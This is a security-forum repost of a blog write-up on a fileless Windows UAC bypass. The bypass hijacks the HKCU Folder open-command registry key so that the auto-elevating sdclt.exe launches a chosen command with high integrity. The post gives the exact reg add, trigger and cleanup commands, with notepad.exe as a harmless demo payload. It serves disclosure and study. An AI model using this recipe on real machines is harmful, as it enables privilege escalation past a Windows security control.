Geeks for your information News Privacy & Security News v
Yet another sdclt UAC bypass
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Yet another sdclt UAC bypass
browneylad Offline
Member
***
Posts: 107
Threads: 8
Thanks Received: 179 in 87 posts
Thanks Given: 353
Joined: 10 November 17
#1
24 January 19, 15:02
Quote:1. Origin of the bypass
As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window. If the user running with medium privileges can make these process load a dll or execute a command, UAC bypass is performed.
In our case, the executable is sdclt.exe. Sdclt is used in the context of Windows backup and restore mechanisms. You can check it auto-elevates using Sysinternals Sigcheck:
Code:
sigcheck.exe -m C:\Windows\System32\sdclt.exe | findstr autoElevate
       <autoElevate  xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</autoElevate>

Note: There are already a couple of known ways to abuse sdclt.exe into bypassing UAC. You can read about those two methods on Matt Nelson’s blog: The method I found is fileless and is based on COM hijacking.
Some interesting events which occur when sdclt.exe is called from a medium integrity process:
  • It runs another process of sdclt.exe with high privilege

  • The high privilege sdclt process calls C:\Windows\System32\control.exe

  • Control.exe process runs with high privilege and ....
[Image: sdclt_name_not_found.png]
Using Sysinternals Procmon, we can see that control.exe is failing to find an open command for the "folder" object in the current user registry (HKCU).
This is very good sign for someone looking to bypass UAC! That is because UAC privileges are not required to write in there so we can basically make an elevated process run a command even if we are in the context of medium integrity process.
2. Exploit the bypass
You can easily test this UAC bypass with a few command lines.
Setup the registry:
Code:
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

Trigger the bypass:
Code:
%windir%\system32\sdclt.exe

You can watch notepad.exe pop with high integrity level.
[Image: procexp2.png]
After that, do not forget to clean the registry with:
Code:
reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f


Read here: http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass

License : Copyright Emeric Nasi, some rights reserved

This work is licensed under a Creative Commons Attribution 4.0 International License.
[-] The following 1 user says Thank You to browneylad for this post:
  • harlan4096
Find
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)
[-]
Welcome
You have to register before you can post on our site.

Username/Email:


Password:

[-]
Recent Posts
Advanced SystemCare PRO 17
Advanced SystemCare ...zevish — 10:04
How to install iOS 16 or iPadOS 16 publ...
IPhone X I Just buyi...thomasan — 08:30
Brave 1.65.114
Release Channel 1....harlan4096 — 06:53
Brave Search: Answer with AI takes over,...
Brave Search's new...harlan4096 — 06:33
Waterfox G6.0.12
Waterfox G6.0.12​ ...harlan4096 — 15:56

[-]
Birthdays
Today's Birthdays
avatar (47)oapedDow
avatar (40)Sanchowogy
Upcoming Birthdays
avatar (43)wapedDow
avatar (42)techlignub
avatar (41)Stevenmam
avatar (48)onlinbah
avatar (49)steakelask
avatar (43)Termoplenka
avatar (41)bycoPaist
avatar (47)pieloKat
avatar (41)ilyagNeexy
avatar (49)donitascene
avatar (49)Toligo
avatar (36)RobertUtelt

[-]
Online Staff
There are no staff members currently online.

>